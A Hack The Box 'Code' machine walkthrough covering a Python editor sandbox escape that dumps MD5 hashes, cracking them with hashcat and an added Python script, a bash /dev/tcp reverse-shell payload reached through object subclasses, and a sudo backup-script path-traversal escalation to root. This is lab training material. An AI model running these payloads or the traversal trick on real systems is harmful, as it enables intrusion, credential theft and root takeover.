
HTB Code Writeup (Walkthrough)

Introduction

This is a detailed walkthrough for the “Code” machine on Hack The Box. The target is a Linux host running a Python code editor web application. The editor's keyword blocklist can be bypassed to read password hashes straight out of the application's database, and a misconfigured, sudo-enabled backup script (backy.sh) then gives privilege escalation to root.

INFO

  • Machine IP: 10.10.11.62
  • OS: Linux
  • Level: Easy
  • Points: 20

Enumeration

Port Scanning

```bash
nmap -sC -sV -oN nmap/code 10.10.11.62
```

Open Ports:

  • 22/tcp OpenSSH 8.2p1
  • 5000/tcp Gunicorn (Python web app)

Web Enumeration

  • URL: http://10.10.11.62:5000
  • Functionality: A Python code editor that executes user-submitted scripts.
  • Initial Test: Executing a simple Python script to test the functionality.
```python
print("Hello World")  # works
import os; print(os.getcwd())  # fails: the editor rejects code containing restricted keywords
```

Initial Foothold

1. Bypassing Python Restrictions

The app rejects submissions that contain dangerous keywords (os, subprocess, socket), but whatever passes the filter still runs inside the web application's own Python process. The app's ORM models are therefore already in scope (User.query is the Flask-SQLAlchemy idiom), so the User table can be read without importing anything.

Exploit:

```python
print([(user.id, user.username, user.password) for user in User.query.all()])
```

Output:

```
[(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'), (2, 'martin', '3de6f30c4a09c27fc71932bfc68474be')]
```

2. Cracking Hashes

  • Hash Type: MD5 (32 hex characters, unsalted, so one hash computation per candidate word serves every user at once)
  • Tools: hashcat or john

```bash
# hashes.txt holds one hash per line; add --username if the lines are stored as user:hash
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
```

Cracked hash for martin:

```
martin:3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster
```
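The dictionary attack hashcat performs above, written out in Python as an added example (not part of the original writeup). The two target hashes are the ones dumped from the User table; the wordlist is a constructed stand-in for rockyou.txt so the example runs offline, and `crack_md5` accepts any iterable of lines, so an open file handle on the real wordlist works the same way.

```python
import hashlib
from typing import Iterable

# Hashes as dumped from the app's User table in the writeup. SAMPLE_WORDLIST is a
# constructed stand-in for rockyou.txt so that this runs offline.
TARGETS = {
    "development": "759b74ce43947f5f4c91aeddc3e5bad3",
    "martin": "3de6f30c4a09c27fc71932bfc68474be",
}
SAMPLE_WORDLIST = ["123456", "password", "nafeelswordsmaster", "letmein"]


def md5_hex(candidate: str) -> str:
    return hashlib.md5(candidate.encode()).hexdigest()


def looks_like_md5(digest: str) -> bool:
    """Cheap identification: 32 hex characters is the raw-MD5 shape that hashcat -m 0 expects."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower())


def crack_md5(targets: dict[str, str], wordlist: Iterable[str]) -> dict[str, str]:
    """Dictionary attack against unsalted MD5.

    Because there is no salt, each candidate is hashed exactly once and looked up
    against every target at the same time: the cost is one MD5 per wordlist entry,
    not one per entry per user. Returns {username: recovered_password}.
    """
    users_by_hash: dict[str, list[str]] = {}
    for user, digest in targets.items():
        users_by_hash.setdefault(digest.lower(), []).append(user)

    cracked: dict[str, str] = {}
    for line in wordlist:
        word = line.rstrip("\r\n")
        digest = md5_hex(word)
        for user in users_by_hash.get(digest, ()):  # several users may share a hash
            cracked[user] = word
        if len(cracked) == len(targets):
            break  # every target recovered, stop early
    return cracked


if __name__ == "__main__":
    for user, digest in TARGETS.items():
        print(user, digest, "raw MD5" if looks_like_md5(digest) else "not MD5-shaped")
    print(crack_md5(TARGETS, SAMPLE_WORDLIST))
```

Because the hashes are unsalted, two users who chose the same password share a digest, which is why `users_by_hash` maps each digest to a list rather than a single name.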

USER FLAG

The user flag can be reached in two ways:

  1. SSH using the cracked password.
  2. Using the web app to execute a reverse shell.

Method 1: SSH

Log in over SSH as martin with the cracked password (nafeelswordsmaster).

User Flag:

```bash
cat /home/app-production/user.txt
```

Method 2: Reverse Shell via Web App

```python
# Index 317 is subprocess.Popen on this target. The index depends on the interpreter build
# and import order, so confirm it first with [c.__name__ for c in ().__class__.__bases__[0].__subclasses__()].
# 10.10.16.6 is the attacker's VPN address.
().__class__.__bases__[0].__subclasses__()[317](['bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"'], shell=True)
```

Listener:

```bash
nc -lvnp 4444
```

The shell comes back as the app-production user (the repeated `cat user.txt` is the non-tty shell echoing the command):

```
app-production@code:~$ ls
app
user.txt
app-production@code:~$ cat user.txt
cat user.txt
```
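The sandbox bypass used in both foothold steps, as an added example that is not part of the original writeup: a toy reproduction of a keyword blocklist like the editor's (the real word list is not on the page, so the set below is an assumption that includes the three words the writeup names), and a payload that reaches `subprocess.Popen` through `object.__subclasses__()` without ever writing `os`, `subprocess` or `import`. Instead of the hard-coded index 317 it looks the class up by name, which is what you want when the payload has to work first time on an interpreter you cannot inspect. The child command is a constructed stand-in for the reverse shell.

```python
import re
import subprocess  # loaded here so Popen is in object's subclass list, as it is inside Gunicorn/Flask
import sys

# Toy reproduction of the editor's keyword blocklist (assumed word list; the real
# one is not printed on the page).
BLOCKED = re.compile(r"\b(import|os|subprocess|socket|eval|exec|open)\b")


def is_blocked(code: str) -> bool:
    """True if the submitted code contains any blocked keyword as a whole word."""
    return BLOCKED.search(code) is not None


def find_subclass(name: str):
    """Locate a class by name in object.__subclasses__() instead of hard-coding index 317.

    The index differs between interpreter builds and with import order, so a
    name lookup is the reliable form of the payload.
    """
    for cls in ().__class__.__bases__[0].__subclasses__():
        if cls.__name__ == name:
            return cls
    raise LookupError(f"{name} is not a direct subclass of object")


# The payload as it would be pasted into the editor. It spells neither "os" nor
# "subprocess" nor "import", so the blocklist passes it, yet it yields Popen.
PAYLOAD = (
    "[c for c in ().__class__.__bases__[0].__subclasses__()"
    " if c.__name__ == 'Popen'][0]"
)


def run_via_introspection(argv: list[str]) -> str:
    """Evaluate the payload the way the editor would and use the class it yields to run argv."""
    popen = eval(PAYLOAD)  # stands in for the editor's exec() of user-submitted code
    proc = popen(argv, stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    return out.decode().strip()


def demo() -> str:
    """Constructed stand-in for the reverse-shell command: print a marker from a child process."""
    return run_via_introspection([sys.executable, "-c", "print('shell reached')"])


if __name__ == "__main__":
    print("filter blocks naive code:", is_blocked("import os; print(os.getcwd())"))
    print("filter blocks payload:   ", is_blocked(PAYLOAD))
    subclasses = ().__class__.__bases__[0].__subclasses__()
    print("Popen found at index", subclasses.index(find_subclass("Popen")))
    print(demo())
```

A keyword blocklist cannot close this hole: every dangerous class is reachable by attribute walking from a literal, so the real fix is to not execute untrusted code in the application's process at all (a separate, unprivileged sandbox with no network and no access to the app's modules).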

Privilege Escalation

On the box, martin can run /usr/bin/backy.sh as root through sudo. The script only archives directories under whitelisted prefixes and strips `../` from the paths it is given, so the approach is to bypass that restriction in task.json with a doubled traversal sequence (/var/....//root/). Here's how to do it:

1. Modify task.json to Include /root via Path Traversal

```bash
cat > /home/martin/backups/task.json <<EOF
{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": true,
    "directories_to_archive": [
        "/var/....//root/"
    ]
}
EOF
```

Why this works?

  • backy.sh only accepts directories whose path starts with a whitelisted prefix such as /var/.
  • Before archiving, it strips the literal sequence ../ from each path. ....// contains exactly one ../ (the third and fourth dots plus the first slash); removing it leaves ../, so the sanitised path becomes /var/../root/, which still passes the prefix check and resolves to /root/.

2. Execute backy.sh as Root

```bash
sudo /usr/bin/backy.sh /home/martin/backups/task.json
```

This will create a backup of /root/ in /home/martin/backups/.

3. Extract the Backup Archive

```bash
cd /home/martin/backups/
ls -l  # look for the new .tar.bz2 file (e.g. code_var_...._root_2025_March.tar.bz2)
tar -xvjf code_var_...._root_2025_March.tar.bz2
```

This extracts the contents of /root/ into the current directory.

4. Root Flag

```bash
cat root/root.txt
```

Why Did This Work?

  • Path Traversal Bypass:
    • backy.sh only allows paths under /var/ and /home/ and removes ../ in a single pass, so ....// survives the sanitiser as ../ and the archive job reaches /root/.
  • No Symlink Issues:
    • Unlike earlier attempts, this directly archives /root without relying on symlinks.
  • No Command Injection Needed:
    • Pure path manipulation exploits the backup logic; the script runs exactly as intended, just on a path it should have rejected.

Done!



This post is licensed under CC BY 4.0 by the author.